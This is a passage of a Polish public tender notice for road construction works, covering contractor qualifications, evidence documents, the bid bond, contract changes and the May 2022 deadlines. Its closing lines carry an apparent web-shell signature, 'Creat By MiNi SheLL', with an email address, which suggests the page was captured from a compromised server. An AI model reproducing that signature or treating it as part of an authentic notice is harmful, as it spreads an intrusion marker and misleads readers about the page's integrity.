drogi/ulicy o nawierzchni bitumicznej, o wartości brutto nie mniejszej dla<br/>jednego zamówienia niż 1,0 mln zł. Przez wartość 1 zamówienia Zamawiający rozumie łączną<br/>wartość zadania w ramach 1 umowy (1 zadania inwestycyjnego); b) dysponują osobą, która<br/>będzie uczestniczyć w realizacji zamówienia w szczególności pełniącą funkcje : Kierownika<br/>budowy/robót - co najmniej 1 osoba posiadająca uprawnienia do kierowania robotami<br/>budowlanymi w specjalności drogowej bez ograniczeń lub inne uprawnienia umożliwiające<br/>wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym<br/>uprawniają uprawnienia budowlane w tej specjalności ** oraz posiadać minimum 2-letnie<br/>doświadczenie zawodowe w kierowaniu tymi robotami i przynależącą do Izby Inżynierów<br/>Budownictwa; (** W rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia<br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831)Dopuszcza się uprawnienia<br/>równoważne do powyższych wydane na podstawie wcześniej obowiązujących przepisów prawa.<br/>W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej<br/>muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że<br/>samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej). Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na<br/>podstawie dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE<br/>SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Po badaniu ofert pod kątem<br/>spełniania przesłanek odrzucenia oraz po wstępnej weryfikacji oświadczeń<br/>dotyczących spełniania warunków oraz braku podstaw do wykluczenia, Wykonawca, którego oferta<br/>zostanie najwyżej oceniona na wezwanie Zamawiającego zobowiązany będzie złożyć następujące<br/>dokumenty w terminie nie krótszym niż 5 dni od dnia wezwania: 1) Odpis lub informację z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w<br/>zakresie art.109 ust.1 pkt 4 ustawy Pzp., sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. 2) Zaświadczenie<br/>właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust.1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące<br/>przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem<br/>Zamawiający żąda złożenia dokumentów potwierdzających, że przed terminem składania ofert<br/>wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności. 3) Zaświadczenie albo inny dokument<br/>właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwej<br/>placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie<br/>zalega z opłaceniem składek na ubezpieczenia społeczne i zdrowotne, zgodnie z art. 109 ust.1 pkt 1<br/>ustawy,wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub<br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności. 4)oświadczenie wykonawcy, w zakresie art.108 ust.1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 10.02.2007r. o ochronie konkurencji i<br/>konsumentów z innym wykonawcą, który złożył odrębna ofertę, albo oświadczenie o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - wzór stanowi<br/>Załącznik nr 5 do SWZ. 5) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125ust.1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, o których mowa w art. 109 ust.1 pkt 1 ustawy, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r.<br/>o podatkach i opłatach lokalnych (Dz. U z 2019 r. poz. 1170) – wzór stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi Załącznik nr 7<br/>do SWZ; b) wykaz robót budowlanych (min. 2 zamówienia) polegające na budowie, przebudowie lub<br/>remoncie itp. (z wyłączeniem remontów cząstkowych) drogi/ulicy o nawierzchni bitumicznej, o wartości<br/>brutto nie mniejszej dla jednego zamówienia niż 1,0 mln zł , wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot , na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - wzór wykazu stanowi<br/>Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych). 2.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą. 3. Wadium może być<br/>wniesione w formach określonych w art. 97 ust.7 ustawy pzp. Pozostałe wymagania odnośnie wnoszenia i zwrotu wadium określono w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia<br/>ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>powinno być załączone do oferty. 2. Wszelka korespondencja prowadzona będzie wyłącznie z<br/>Pełnomocnikiem. 3.Oświadczenia, o których mowa w rozdz. XII ppkt 1.4 i 1.5 SWZ, składa<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 4. W przypadku<br/>wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, o<br/>których mowa w art. 117Pzp warunek udziału o którym mowa w rozdz. VII pkt. 2 SWZ jest<br/>spełniony jeżeli Wykonawca,ubiegający się o zamówienia wspólnie z innymi wykonawcami, i<br/>który dostarcza potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie<br/>wykształcenia,kwalifikacji zawodowych lub doświadczenia, ma obowiązek osobiście wykonać tę<br/>część zamówienia, dla której te zdolności są wymagane. 5. W przypadkach, o których mowa<br/>wyżej,Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie,z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. 6.Zamawiający w stosunku do Wykonawców ubiegających się o<br/>zamówienie, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej -<br/>dopuszcza łączne spełnienie warunku przez Wykonawców. 7. Oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian w umowie w następujących przypadkach:<br/>1.Termin wykonania umowy może ulec przesunięciu w przypadku opóźnień wynikających z:<br/>a)przestojów i opóźnień zawinionych przez Zamawiającego, b) wystąpienia warunków<br/>atmosferycznych uniemożliwiających wykonywanie robót – fakt ten musi zostać zgłoszony<br/>Zamawiającemu i zostać potwierdzony przez inspektora nadzoru , c) poleceń wydawanych przez Inspektora Nadzoru mających wpływ na termin wykonania, lecz niewynikających z<br/>uchybień Wykonawcy, d) wykopalisk uniemożliwiających prowadzenie robót, e)wystąpienia<br/>istotnego błędu w dokumentacji – termin umowny może zostać wydłużony o czas niezbędny na<br/>usuniecie wad w dokumentacji, f) konieczności uzyskania decyzji lub uzgodnień,mogących<br/>spowodować wstrzymanie robót z przyczyn niezależnych od wykonawcy, g)podpisania umowy<br/>na zamówienia dodatkowe, o ile wykonywanie tych zamówień wpływa na termin wykonania<br/>niniejszej umowy, h) wystąpienia siły wyższej (zgodnie z opisem w § 27 wzoru umowy<br/>stanowiącej Załącznik nr 9 do SWZ). 2. W uzasadnionych przypadkach, w ramach<br/>przedmiotowego zamówienia, dopuszcza się, za zgodą Zamawiającego, możliwość wykonania<br/>robót budowlanych w inny sposób niż określono to w dokumentacji (tj. wykonania tzw. robót<br/>zamiennych). Przedmiotowe zmiany muszą być korzystne dla Zamawiającego (zamiany na<br/>materiały, urządzenia, sprzęt posiadające co najmniej takie parametry techniczne, jakościowe i<br/>cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty) i nie mogą prowadzić do<br/>zwiększenia wynagrodzenia Wykonawcy. Zmiana sposobu wykonania robót, o której mowa<br/>powyżej może być dokonana jedynie za zgodą Zamawiającego i może nastąpić w szczególności<br/>na skutek zmian technologicznych spowodowanych na przykład następującymi okolicznościami:<br/>(zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). 3. Zamawiający<br/>przewiduje dokonanie zmian w umowie będących następstwem działania organów administracji,<br/>w szczególności: (zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ).<br/>4. Zamawiający przewiduje możliwość zmiany kierownika budowy i kierowników robót, przy<br/>czym osoby zastępujące muszą spełniać warunki określone w umowie. 5. W przypadku, gdy<br/>Wykonawca w ofercie nie przewidział korzystania z podwykonawców, przewiduje się możliwą<br/>zmianę umowy dotyczącą powierzenia przez Wykonawcę wykonywania części zamówienia<br/>podwykonawcom lub dalszym podwykonawcom, jeżeli Wykonawca uzna to za konieczne i złoży<br/>odpowiedni wniosek w formie pisemnej. 6. W przypadku, gdy Wykonawca w ofercie przewidział<br/>korzystanie z podwykonawców, przewiduje się możliwą zmianę umowy dotyczącą<br/>samodzielnego wykonania przedmiotu zamówienia lub zwiększenia bądź zmniejszenia liczby<br/>podwykonawców, jeżeli Wykonawca uzna to za konieczne i złoży odpowiedni wniosek w formie<br/>pisemnej, przy czym jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na<br/>którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy<br/>Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest<br/>obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca<br/>samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o<br/>udzielenie zamówienia. 7. Zamawiający, jeżeli projekt dotyczący realizacji inwestycji w ramach<br/>któregokolwiek z zadań zostanie zakwalifikowany do dofinansowania, przewiduje również<br/>możliwość dokonania zmian postanowień umowy w stosunku do treści oferty w<br/>przypadkach,gdy: (zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ).<br/>8. Wysokość wynagrodzenia Wykonawcy może ulec zmianie w sytuacji: (zgodnie z opisem w §<br/>28 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). Szczegółowy opis rodzaju i zakresu<br/>zmian oraz warunki wprowadzenia zmian zawiera § 27, § 28 wzoru umowy stanowiącej<br/>Załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej pod adresem https://zdp-powiatkrasnicki.ezamawiajacy.pl (zgodnie z instrukcją określoną w rozdziale XIII SWZ)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com